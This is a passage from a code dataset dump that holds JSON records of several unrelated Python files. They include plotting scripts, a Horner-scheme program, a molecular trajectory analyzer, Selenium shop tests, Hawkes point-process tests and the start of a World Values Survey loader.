\"+\"\r\n\r\ndf[[0,1,2,3,4,5]].to_csv(outFile,sep=\"\\t\",header=False,index=False)\r\n\r\ndf[[3,4]].to_csv(sizeFile,sep=\"\\t\",header=False,index=False)\r\n\r\n","sub_path":"share/misc/get_uniform_bed.py","file_name":"get_uniform_bed.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"219389410","text":"import numpy as np\nfrom numpy.core.multiarray import datetime_as_string\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport joblib\nimport sys\nimport matplotlib.dates as mdates\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\n# 引数でプロジェクト名指定\nif len(sys.argv) != 2:\n print(\"No argument len\")\n sys.exit()\n\nproject = sys.argv[1]\n\na = joblib.load(f\"scripts/evaluation_accuracy/result/{project}.pkl\")\nb = joblib.load(f\"scripts/evaluation_accuracy/result/{project}_2.pkl\")\nprint(a)\nprint(b)\nnot_use_datetime = a[\"hyouka_1\"]\nuse_datetime = b[\"hyouka_2\"]\n\nnum_data_n = len(not_use_datetime)\nnum_data_u = len(use_datetime)\n\ndate_n = not_use_datetime.index.values\ndate_u = use_datetime.index.values\n\nans_n = [0] * num_data_n\nans_u = [0] * num_data_u\nx = 0\nfor j in range(num_data_u):\n x += use_datetime.iloc[j]\n ans_u[j] = x / (j+1)\n\nx = 0\nfor j in range(num_data_n):\n x += not_use_datetime.iloc[j]\n ans_n[j] = x / (j+1)\n\ndate_n = pd.DataFrame(date_n)\ndate_u = pd.DataFrame(date_u)\nans_n = pd.DataFrame(ans_n)\nans_u = pd.DataFrame(ans_u)\n\nans_n[\"datetime\"] = date_n\nans_u[\"datetime\"] = date_u\n\nans_n.set_index(\"datetime\",inplace=True)\nans_u.set_index(\"datetime\",inplace=True)\nans_n = ans_n.resample('M', label='left').mean().ffill()\nans_u = ans_u.resample('M', label='left').mean().ffill()\ndate_n = ans_n.index.values\ndate_u = ans_u.index.values\n\nif len(ans_n) < len(ans_u):\n date = ans_n.tail(1).index.date\n date = date + relativedelta(months=1)\n date = date[0].strftime(\"%Y-%m-%d\")\n date = datetime.datetime.strptime(date, '%Y-%m-%d')\n val = ans_n.tail(1)[0][0]\n df_tmp = pd.Series([val], index=[date])\n ans_n = pd.concat([ans_n, df_tmp])\n pd.to_datetime(date)\n date = np.datetime64(date)\n date_n = np.append(date_n, date)\n\nprint(ans_n)\nprint(date_n)\n\nsxmin='2011-03-01'\n#sxmin='2010-08-01'\nsxmax='2016-10-31'\nxmin = datetime.datetime.strptime(sxmin, '%Y-%m-%d')\nxmax = datetime.datetime.strptime(sxmax, '%Y-%m-%d')\n#plt.xlim(xmin, xmax)\nplt.ylim(-0.05, 1.05)\n\nplt.plot(date_n, ans_n, marker=\"o\", label=\"時系列を考慮しなかった場合\")\nplt.plot(date_u, ans_u, marker=\"x\", linestyle=\"dashed\", label=\"時系列を考慮した場合\")\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m'))\nplt.gca().xaxis.set_major_locator(mdates.MonthLocator(interval=6))\nplt.gca().xaxis.set_minor_locator(mdates.MonthLocator(interval=1))\nplt.gca().tick_params(width = 2, length = 10)\nplt.legend(fontsize=20)\n\n# y軸のラベル\nplt.xticks(rotation=90)\nplt.ylabel(\"正解率\", fontsize=16)\n\nplt.grid(which='major',color='black',linestyle='--')\n\n# 表示する\nplt.show()\n","sub_path":"scripts/evaluation_accuracy/pickle_plot.py","file_name":"pickle_plot.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"256768483","text":"\"\"\"Schema lui Horner\"\"\"\n\"\"\"Test laborator:\nS. Horner:\nn=5\nP(n)=2n**5-3n**4+4*n+7\n:(x-2)\nCAtul:2x**4+x**3+2x**2+4x+12\nRestul: 31\"\"\"\nfrom numpy import zeros\nn = eval(input('n='))\na = zeros((n+1), dtype=int)\nb = zeros((n+1), dtype=int)\nfor i in range(0,n+1):\n print('a[', i, ']=')\n a[i] = eval(input())\nc=int(input('c='))\nb[0]=a[0]\nfor i in range(1,n+1):\n b[i] = c*b[i-1]+a[i]\nprint(\"Coeficientii catului sunt: \", end='')\nfor i in range(0,n):\n print(b[i], end='')\nprint(\"Restul este: \", b[n])","sub_path":"generate_nr_from_4/schema_lui_horner.py","file_name":"schema_lui_horner.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"582422107","text":"import sys\nimport json\nimport re\n\ndef get_versions() -> (str, str):\n version_f90 = sys.stdin.read()\n version_number = re.search(r\"version=([0-9\\.]+)\", version_f90).group(1)\n revision_res = re.search(r\"revision=(\\d+)\", version_f90)\n svn_revision = revision_res.group(1) if revision_res else None\n return version_number, svn_revision\n\nif __name__ == '__main__':\n\n version_number, svn_revision = get_versions()\n docset_version = \"%s (r%s)\" % (version_number, svn_revision) if svn_revision else version_number\n\n with open('build/docset.json', 'w', encoding='utf8') as fp:\n json.dump({\n \"name\": \"Quantum ESPRESSO\",\n \"version\": docset_version,\n \"archive\": \"QuantumESPRESSO.tgz\",\n \"author\": {\n \"name\": \"Chenxing Luo\",\n \"link\": \"https://github.com/chazeon\"\n },\n \"aliases\": [\"qe\", \"quantum-espresso\"]\n }, fp, indent=4)\n\n with open('build/meta.json', 'w', encoding='utf8') as fp:\n json.dump({\n \"name\": \"QuantumESPRESSO\",\n \"revision\": \"0\",\n \"title\": \"Quantum ESPRESSO\",\n \"version\": docset_version\n }, fp, indent=4)\n","sub_path":"src/gen_version.py","file_name":"gen_version.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"202749765","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 15 03:43:52 2014\n\n@author: GEOS_SS1\n\"\"\"\n\ndef long_substr(data):\n substr = ''\n if len(data) > 1 and len(data[0]) > 0:\n for i in range(len(data[0])):\n for j in range(len(data[0])-i+1):\n if j > len(substr) and is_substr(data[0][i:i+j], data):\n substr = data[0][i:i+j]\n return substr\n\ndef is_substr(find, data):\n if len(data) < 1 and len(find) < 1:\n return False\n for i in range(len(data)):\n if find not in data[i]:\n return False\n return True\n \n#print long_substr(['Oh, hello, my friend.',\n# 'I prefer Jelly Belly beans.',\n# 'When hell freezes over!'])\nprint","sub_path":"Scripts/randomekek.py","file_name":"randomekek.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"164289316","text":"#!/usr/bin/env python\n\n''' ANALYZE MOVIES\nworking in anaconda WITH python 3.6.5\nPROGRAM DO GEOMETRY ANALYSIS OF MOVIE-LIKE (in XYZ format) FILES\n\nFOR ANY MOLECULAR SYSTEM ONLY /natoms & molecule/ VARABLES NEED TO BE MODIFIED IN FUNCTION input_check() TO GET DISTANCE MATRICES\n\n1/ EACH FILE IS CHECKED IF IT IS COMPLETE (NUMBER OF LINE MUST MATCH NATOMS+2 CRITERIA) :: def geoms_check\n2/ GO THROUGH EACH MOVIE ONE BY ONE GEMEOTRY -> CREATE DISTANCE MATRIX // should be fast according to measuring of walltime\n3/ PROCESS DISTANCE MATRIX ACCORDING TO PARTICULAR SYSTEM (ANALYSIS IS ALWAYS DIFFERENT AND DEPENDS ON POSSIBLE REACTION CHANNEL) \n\n- TO DO - CREATE CLUSTERING ALGORITHM INDEPENDENT OF SYSTEM WHICH WILL FIND MOLECULAR FRAGMENT/SEPARATE MOLECULES \n- IF DISTANCE MATRICES ARE STORED FOR FUTURE USE, JAGGED MATRICES MIGHT BE BETTER AND SAVE SOME MEMORY INSTEAD OF USING THE FULL NATOMS X NATOMS DISTANCE MATRIX (especial for dense, low timestep simulations)\n'''\nimport math\nimport sys\nimport numpy as np\nimport random\nimport time\nimport os\nimport subprocess\nimport string\nimport itertools\nimport csv\n##############################################\n##############################################\n##############################################\n\nnp.set_printoptions(linewidth = 150) # avoid text wrapping in console when printing np.array for checks\n\ndef input_check():\n global molecule,natoms,results_file # same number and molecule for all movies and geoms\n if len(sys.argv) < 3:\n print(\"Error: not enought parameters.\\nUsage: python \",sys.argv[0],\" th/tm/molecule movie.xyz movie2.xyz....\")\n sys.exit(1)\n\n movies = []\n lines = []\n geoms = []\n molecule = sys.argv[1] # TMTH or THMS\n movs = sys.argv[3:] # list of movies to process\n results_file = sys.argv[2] # file used for saving final data\n \n ##### MODIFIE HERE FOR SPECIFIC MOLECULE: #####\n if molecule == \"tm\":\n lines_per_mol = 17\n natoms = 15\n elif molecule == \"th\":\n lines_per_mol = 13\n natoms = 11\n else: sys.exit(\"Wrong system (tm/th)\")\n \n print('Number of movie files requested:', len(sys.argv)-2)\n\n for mov in movs:\n cwd = os.getcwd()\n movie_path = os.path.join(cwd,mov)\n\n if os.path.isfile(movie_path):\n movies.append(movie_path)\n gc = geoms_check(movies[-1],lines_per_mol) #no need to specify order\n #print(gc)\n lines.append(gc[0])\n geoms.append(gc[1])\n print(mov,' OK, Nlines: ', lines[-1], 'Ngeoms: ', geoms[-1])\n else:\n print(mov ,' File NOT EXISTS.') \n print('File check finished.',\"\\n\",'##########FILES:############################')\n return molecule,movies,geoms\n#end input check\n\ndef geoms_check(mov,lines_per_mol): # fast number_of_lines_ reader exploiting limited buffer \n lines = 0\n geoms = 0\n buf_size = 1024 * 1024\n with open(mov,'r') as f:\n read_f = f.read\n buf = read_f(buf_size)\n while buf:\n lines += buf.count('\\n') \n #\\n) is left at the end of the string, and is only omitted on the last line of the file\n buf = read_f(buf_size)\n f.close()\n if not (lines % lines_per_mol): geoms = lines / lines_per_mol # 0 FALSE\n else:\n print('Nlines is not divisible by l_p_m: ',lines, lines_per_mol, mov)\n print('Check if there is empty line at the end of the file \\n')\n sys.exit(1)\n return lines,geoms\n\n# MAIN ROUTINE TO GO THROUGH EACH MOVIE - READ XYZ, CALCULATE DISTANCE, ANALYZE GEOMETRY\ndef process_movies(movies,geoms):\n \"\"\"\n Expecting .xyz file \n first line = natoms\n second line = comment + time/timestep information, might require change in timestep assingment split index []\n \"\"\"\n analyzed_geoms = np.array([[0, 0]]) # main array with time and reaction channel for each geometry\n for m,mov in enumerate(movies): # iterate over movies\n print(\"Processing \",m+1,\"movie: \",mov)\n with open(mov,'r') as f:\n \n for g in range(1,int(geoms[m])+1): # iterate over geoms in each mov file, first index is inclusive, last exclusive!\n #natoms = int(f.readline())\n atoms = f.readline() # atoms\n timestep = f.readline().split()[2] # comment + time \n if g == 1:\n xyz = np.zeros(shape=(natoms,3))\n if os.path.isfile(os.path.join(os.getcwd(),'dist_mat.dat')): os.remove('dist_mat.dat') \n #print('geometry: ',g)\n\n for at in range(0,natoms): # iterate over atoms in each geometry\n line = f.readline().split()\n xyz[at]=[float(line[1]),float(line[2]),float(line[3])]\n #print(time,\"\\n\",xyz)\n \n dist_mat = distance_matrix(xyz) #cal dist matrix\n \n ##### MODIFIE HERE FOR SPECIFIC MOLECULE: #####\n if molecule == \"tm\" : channel = analyze_tm(dist_mat)[0] # analyze geometry\n elif molecule == \"th\" : channel = analyze_th(dist_mat)[0] \n \n analyzed_geoms = np.append(analyzed_geoms, [[int(timestep),int(channel)]], axis = 0) # save analyzed data for statistics\n f.close()\n \n return(analyzed_geoms)\n \n# DISTANCE MATRIX\ndef distance_matrix(xyz): \n# all combinations of pairs: list(itertools.combinations(range(natoms),2)) - yet still need to loop over two-indices to call dist func brute force number of combinations len(<-)\n# with open('dist_mat.dat','a') as file_dist_save: # save dist_mat in file for check if needed\n# np.savetxt(file_dist_save, dist_mat, newline='\\n', fmt='%.8e',footer =\" \")\n dist_mat = np.zeros(shape=(natoms-1,natoms)) # create empty dist matrix - matrix is not stored for future\n for k in range(0,natoms):\n for l in range(k+1,natoms):\n v1, v2 = np.array(xyz[k]), np.array(xyz[l])\n dist = [(a - b)**2 for a, b in zip(v1, v2)]\n dist_mat[k][l] = math.sqrt(sum(dist))\n # print(v1,v2,l,k) # combination check\n\n return dist_mat\n\n###############################################\n#ConstantS - CRITERIA FOR GEOMETRY ANALYSIS \nH_diss_dist = 3.000 \nOO_bond_dist = 4.500\nCH_bond_dist = 3.000\nHH_bond_dist = 1.500 \nSnH_bond_dist = 3.000\nSnX_bond_dist = 5.000 # x = C or O \n###############################################\n\n# GEOMETRY ANALYSIS \ndef analyze_th(dist_mat):\n#print(molecule,natoms)\n channel = 0\n me_diss = 0\n oh_diss = 0\n h_diss = 0 # number of dissciated hydrogen atom\n h_diss_index = [] # which H atoms are dissociated\n h_bonds = [] # list of X - H bonds to test for shortest distance \n h_ats_on_heavies = [0,0,0,0,0] # how many H atoms are on each heavy atom\n \n for hydrogen_atom in range(5,natoms):\n for heavy_atom in range(0,5): # last index excluded, upper diagonal l matrix, first index < second one\n h_bonds.append(dist_mat[heavy_atom][hydrogen_atom])\n #print(hydrogen_atom,heavy_atom,\" : \",dist_mat[heavy_atom][hydrogen_atom])\n \n shortest_bond = min((j,i) for i,j in enumerate(h_bonds)) # find the smallest bod and print heavy atom related to it, enumerate over heavy atoms 0 - 5\n h_bonds.clear() # dont need anymore \n \n #1a) how many hydrogens are on each heavy atom\n if shortest_bond[0] < H_diss_dist: \n h_ats_on_heavies[shortest_bond[1]] = h_ats_on_heavies[shortest_bond[1]] + 1\n else : \n h_diss = h_diss + 1 \n h_diss_index.append(shortest_bond[1])\n if h_diss >= 2: \n print(\"#### 2 diss H CAREFULL\")\n # print(\"O,Sn,O,C,O: \",h_ats_on_heavies) \n \"\"\"\n atom order:\n 0 O Sn-C = 1,2\n 1 Sn \n 2 O Sn-O = 1,2\n 3 C Sn-C = 1,3\n 4 O Sn-O = 1,4\n 5-11 H\n\n Channels:\n 0 nothing happened\n 1 1 Methyl diss\n 2 1 OH diss \n 3 2 OH diss \n 4 OH + Methyl diss\n 5 Methyl + 2 or more OH diss\n 6 H diss + komplex\n 7 H diss (komplex + O + H)\n 8 H diss (komplex + CH2 + H)\n 9 3 OH diss\n \"\"\"\n if h_ats_on_heavies[1] > 0: exit(\"########## H transfer to Sn, check!!!!! #####\")\n \n if dist_mat[1][3] > SnX_bond_dist: \n me_diss = me_diss + 1\n \n if dist_mat[0][1] > SnX_bond_dist: \n oh_diss = oh_diss + 1\n if (me_diss == 0 and h_ats_on_heavies[0] == 0) : channel = 7 \n \n if dist_mat[1][2] > SnX_bond_dist: \n oh_diss = oh_diss + 1 \n if (me_diss == 0 and h_ats_on_heavies[2] == 0) : channel = 7 \n \n if dist_mat[1][4] > SnX_bond_dist: \n oh_diss = oh_diss + 1\n if (me_diss == 0 and h_ats_on_heavies[4] == 0) : channel = 7 \n \n if h_diss == 0:\n if me_diss == 0: \n if oh_diss == 1: channel = 2 \n if oh_diss == 2: channel = 3\n if oh_diss == 3: channel = 9\n elif me_diss == 1:\n if oh_diss == 0: channel = 1 \n elif oh_diss == 1: channel = 4 \n elif oh_diss == 2: channel = 5 \n elif oh_diss == 3: channel = 5\n elif h_diss == 1:\n if (me_diss == 0 and oh_diss == 0): channel = 6\n if (me_diss == 1 and oh_diss == 0 and h_ats_on_heavies[3] == 2) : channel = 8 #H from CH3 group \n # print(' channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies:',channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies)) \n # print(\"----------------------------------\")\n return channel,h_diss\n\n# GEOMETRY ANALYSIS \ndef analyze_tm(dist_mat):\n \"\"\"\n atom order:\n 0 Sn \n 1 C Sn-C = 1,2\n 2 C Sn-C = 1,3\n 3 C Sn-C = 1,4\n 4 O Sn-O = 1,5\n 5-14 H\n \"\"\"\n#1) WHERE ARE HYDROGEN ATOMS\n\n channel = 0\n h_diss = 0 # number of dissciated hydrogen atom\n h_diss_index = [] # which H atoms are dissociated\n h_bonds = [] # list of X - H bonds to test for shortest distance \n h_ats_on_heavies = [0,0,0,0,0] # how many H atoms are on each heavy atom\n \n for hydrogen_atom in range(5,natoms):\n for heavy_atom in range(0,5): # last index excluded, upper diagonal l matrix, first index < second one\n h_bonds.append(dist_mat[heavy_atom][hydrogen_atom])\n #print(hydrogen_atom,heavy_atom,\" : \",dist_mat[heavy_atom][hydrogen_atom])\n \n shortest_bond = min((j,i) for i,j in enumerate(h_bonds)) # find the smallest bod and print heavy atom related to it, enumerate over heavy atoms 0 - 5\n h_bonds.clear() # dont need anymore \n \n #1a) how many hydrogens are on each heavy atom\n if shortest_bond[0] < H_diss_dist: \n h_ats_on_heavies[shortest_bond[1]] = h_ats_on_heavies[shortest_bond[1]] + 1\n else : \n h_diss = h_diss + 1 \n h_diss_index.append(shortest_bond[1])\n if h_diss >= 2: \n print(\"2 diss H CAREFULL\")\n #print(\"Sn,C,C,C,O: \",h_ats_on_heavies) \n if h_ats_on_heavies[0] > 0: exit(\"########## H transfer to Sn, check!!!!! #####\")\n#2) Where are the heavy atoms \n oh_diss = 0 # OH group diss 0/1\n me_diss = 0 # Methyl group diss / if h_diss = 0 otherwise CH2, CH1 possible\n \n # Sn-O\n if dist_mat[0][4] > SnX_bond_dist: oh_diss = oh_diss + 1\n \n # Sn-C\n for heavy_atom in range(1,4): \n if dist_mat[0][heavy_atom] > SnX_bond_dist: \n me_diss = me_diss + 1\n if (oh_diss == 0 and h_ats_on_heavies[heavy_atom] == 2) : channel = 8\n\n\n \"\"\"\n Channels:\n 0 nothing happened\n 1 1 Methyl diss\n 2 1 OH diss \n 3 2 Methyl diss \n 4 OH + Methyl diss\n 5 OH + 2 or more Methyl diss\n 6 H diss + komplex\n 7 H diss (komplex + O + H)\n 8 H diss (komplex + CH2 + H)\n 9 3 Methyl diss\n \"\"\" \n if h_diss == 0:\n if oh_diss == 0: \n if me_diss == 1: channel = 1 \n elif me_diss == 2: channel = 3 \n elif me_diss == 3: channel = 9 \n elif oh_diss == 1:\n if me_diss == 0: channel = 2 \n elif me_diss == 1: channel = 4 \n elif me_diss == 2: channel = 5 \n elif me_diss == 3: channel = 5\n elif h_diss == 1:\n if (me_diss == 0 and oh_diss == 0): channel = 6\n if (me_diss == 0 and oh_diss == 1 and h_ats_on_heavies[4] == 0) : channel = 7 #H from O group \n #print(' channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies:',channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies)) \n #print(\"----------------------------------\")\n \n #if channel == 9: print(\"unknown geom or nothing happened\") \n return channel,h_diss \n \ndef channel_statistics(analyze_geoms):\n \"\"\"\n MODIFIE PARAMETERS FOR EACH TYPE OF MOLECULE (n_channels)\n nstep, timestep depends on simulation number of steps (e.g. nsteps in input.in)\n \"\"\"\n AU_TO_FS = 0.024189\n n_channels = 10\n n_steps = 2100 + 1 # number of simulation steps, +1 since upper limit index is exluded\n timestep = 10 # \n procentual = 1 # 0 - 1 or 0-100\n \n channel_pop = np.zeros(shape=(n_steps,n_channels)) # 2D array, 0 column time, rest {1,n_channel} are channels\n #totpop = np.zeros(shape=(n_steps)) # no need to store totpop in each step\n print(\"Total number of geoms: \",len(analyze_geoms)-1)\n for rec in range(1,len(analyze_geoms)): # first row is 0,0 entry from array init\n channel = int(analyze_geoms[rec][1])\n step = int(analyze_geoms[rec][0])\n time = (step * timestep) * AU_TO_FS\n channel_pop[step][channel] = channel_pop[step][channel] + 1 \n for step in range(1,n_steps): \n totpop = sum(channel_pop[step])\n time = (step * timestep) * AU_TO_FS\n for chan in range(0,n_channels):\n channel_pop[step][chan] = (channel_pop[step][chan]/totpop) * procentual \n line = ( str('%.4f ' %time) + (\" \".join(\"%.3f\" %n for n in channel_pop[step])) + \"\\n\")\n \n #WRITE EACH LINE\n with open(results_file, 'a') as res_file:\n res_file.write(line)\n res_file.close()\n \n##############################################\n ########## MAIN ##########\n##############################################\n\nmolecule,movies,geoms=input_check()\nprint(\"Molecule: \",molecule,\"\\n Geoms: \",geoms)\nprint(\"#######################\\n\")\n\nanalyze_geoms = process_movies(movies,geoms) # np.array returning time, channel over all geoms\n#print(analyze_geoms)\nstatistic = channel_statistics(analyze_geoms)\n\n\n\n#distance_matrix(movies)\n","sub_path":"tin-analyzer.py","file_name":"tin-analyzer.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"335752011","text":"import pytest\nimport time\n\nfrom .pages.basket_page import BasketPage\nfrom .pages.product_page import ProductPage\nfrom .pages.login_page import LoginPage\n\nproduct_url = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\nregistration_url = \"http://selenium1py.pythonanywhere.com/accounts/login/\"\n\n\n@pytest.mark.login\nclass TestLoginFromProductPage:\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self):\n self.link = product_url\n yield\n pass\n\n @pytest.mark.need_review\n def test_guest_can_go_to_login_page_from_product_page(self, browser):\n page = ProductPage(browser, self.link)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n login_page.should_be_login_page()\n\n def test_guest_should_see_login_link(self, browser):\n page = ProductPage(browser, self.link)\n page.open()\n page.should_be_login_link()\n\n\nclass TestUserAddToBasketFromProductPage:\n\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n page = LoginPage(browser, registration_url)\n page.open()\n email = str(time.time()) + \"@fakemail.org\"\n page.register_new_user(email, \"test_password\")\n page.should_be_authorized_user()\n\n def test_user_cant_see_success_message(self, browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.is_result_messages_not_present()\n\n @pytest.mark.need_review\n def test_user_can_add_product_to_basket(self, browser):\n page = ProductPage(browser, product_url+\"?promo=offer1\")\n page.open()\n page.should_be_product_page()\n page.add_to_basket_page()\n page.solve_quiz_and_get_code()\n page.should_be_success_added_page()\n\n\n@pytest.mark.need_review\n@pytest.mark.parametrize('link', [product_url + \"?promo=offer0\",\n product_url + \"?promo=offer1\",\n product_url + \"?promo=offer2\",\n product_url + \"?promo=offer3\",\n product_url + \"?promo=offer4\",\n product_url + \"?promo=offer5\",\n product_url + \"?promo=offer6\",\n pytest.param(product_url + \"?promo=offer7\", marks=pytest.mark.xfail),\n product_url + \"?promo=offer8\",\n product_url + \"?promo=offer9\"])\ndef test_guest_can_add_product_to_basket(browser, link):\n page = ProductPage(browser, link)\n page.open()\n page.should_be_product_page()\n page.add_to_basket_page()\n page.solve_quiz_and_get_code()\n page.should_be_success_added_page()\n\n\n@pytest.mark.xfail\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.add_to_basket_page()\n page.is_result_messages_not_present()\n\n\ndef test_guest_cant_see_success_message(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.is_result_messages_not_present()\n\n\n@pytest.mark.xfail\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.add_to_basket_page()\n page.is_result_messages_disappeared()\n\n\n@pytest.mark.need_review\ndef test_guest_cant_see_product_in_basket_opened_from_product_page(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.go_to_basket()\n basket_page = BasketPage(browser, browser.current_url)\n basket_page.should_be_empty()\n","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"34440708","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom stppg import HawkesLam, SpatialTemporalPointProcess, StdDiffusionKernel, GaussianDiffusionKernel, GaussianMixtureDiffusionKernel\nfrom utils import plot_spatio_temporal_points, plot_spatial_intensity, plot_spatial_kernel, DataAdapter\n\ndef test_std_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n standard diffusion kernel\n '''\n # parameters initialization\n mu = .1\n kernel = StdDiffusionKernel(C=1., beta=1., sigma_x=.1, sigma_y=.1)\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n\n # generate points\n points, sizes = pp.generate(\n T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n batch_size=100, verbose=True)\n print(points)\n print(sizes)\n\n # read or save to local npy file.\n # points = np.load('results/tf_thining_samples.npy')\n np.save('results/hpp_Feb_25.npy', points)\n\n # plot intensity of the process over the time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\ndef test_gaussian_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n Gaussian diffusion kernel\n '''\n mu = .1\n kernel = GaussianDiffusionKernel(\n layers=[5, 5], C=1., beta=1., \n SIGMA_SHIFT=.2, SIGMA_SCALE=.05, MU_SCALE=.1, is_centered=True)\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n print(kernel.Ws)\n print(kernel.bs)\n\n # plot kernel parameters over the spatial region.\n plot_spatial_kernel(\"results/kernel.pdf\", kernel, S=[[-1., 1.], [-1., 1.]], grid_size=50)\n\n # generate points\n points, sizes = pp.generate(\n T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n batch_size=2, verbose=True)\n print(points)\n print(sizes)\n\n # read or save to local npy file.\n # points = np.load('results/free_hpp_Mar_15_layer_5.npy')\n # np.save('results/gaussian_hpp_Mar_15_layer_5.npy', points)\n\n # plot intensity of the process over the time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\ndef test_random_gaussian_mixture_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n random Gaussian mixture diffusion kernel\n '''\n mu = .2\n kernel = GaussianMixtureDiffusionKernel(\n n_comp=5, layers=[5, 5], C=1., beta=1., \n SIGMA_SHIFT=.2, SIGMA_SCALE=.05, MU_SCALE=.05)\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n\n # generate points\n points, sizes = pp.generate(\n T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n batch_size=2, verbose=True)\n print(points.shape)\n print(sizes)\n\n # read or save to local npy file.\n # points = np.load('results/free_hpp_Mar_15_layer_5.npy')\n # np.save('results/gaussian_hpp_Mar_15_layer_5.npy', points)\n\n # plot intensity of the process over the time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\ndef test_pretrain_gaussian_mixture_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n pretrained Gaussian mixture diffusion kernel\n '''\n params = np.load('data/ambulance_mle_gaussian_mixture_params.npz')\n mu = params['mu']\n beta = params['beta']\n kernel = GaussianMixtureDiffusionKernel(\n n_comp=5, layers=[5], C=1., beta=beta, \n SIGMA_SHIFT=.05, SIGMA_SCALE=.2, MU_SCALE=.01,\n Wss=params['Wss'], bss=params['bss'], Wphis=params['Wphis'])\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n\n # # generate points\n # points, sizes = pp.generate(\n # T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n # batch_size=2, verbose=True)\n # print(points.shape)\n # print(sizes)\n\n # read or save to local npy file.\n points = np.load('data/ambulance.perday.npy')\n da = DataAdapter(init_data=points)\n points = da.normalize(points)\n # np.save('results/gaussian_hpp_Mar_15_layer_5.npy', points)\n print(points[0].shape)\n\n # plot intensity of the process over the time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\n\nif __name__ == '__main__':\n np.random.seed(1)\n np.set_printoptions(suppress=True)\n\n test_pretrain_gaussian_mixture_diffusion()\n\n # T = [0., 10.]\n # S = [[-1., 1.], [-1., 1.]]\n\n # mu = .1\n # # kernel = StdDiffusionKernel(C=1., beta=1., sigma_x=.08, sigma_y=.08)\n # kernel = GaussianMixtureDiffusionKernel(\n # n_comp=5, layers=[5], \n # beta=1., C=1., SIGMA_SHIFT=.1, SIGMA_SCALE=.15, MU_SCALE=.1,\n # Wss=None, bss=None, Wphis=None)\n # lam = HawkesLam(mu, kernel, maximum=1e+3)\n # pp = SpatialTemporalPointProcess(lam)\n\n # points = np.load('data/apd.crime.perday.npy')\n # print(len(np.nonzero(points[0, :, 0])[0]))\n # print(points[0])\n\n # plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n # t_slots=1000, grid_size=50, interval=100)\n\n # # t = np.array([10])\n # # s = np.array([1,1])\n # # his_t = np.array([1, 2, 3])\n # # his_s = np.array([[.1, .2] ,[.2, .3], [.3, .4]])\n # # kernel.nu(t, s, his_t, his_s)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"326233981","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nWorld Value Survey\r\nBrincando com os dados\r\nGerson Vasconcelos\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\n\r\nos.listdir() #listar o diretório atual\r\n\r\nwvs = pd.read_csv('WV6_Data_ascii_v_2015_04_18.dat',\r\n header = None)\r\n# parametro header = None diz que não 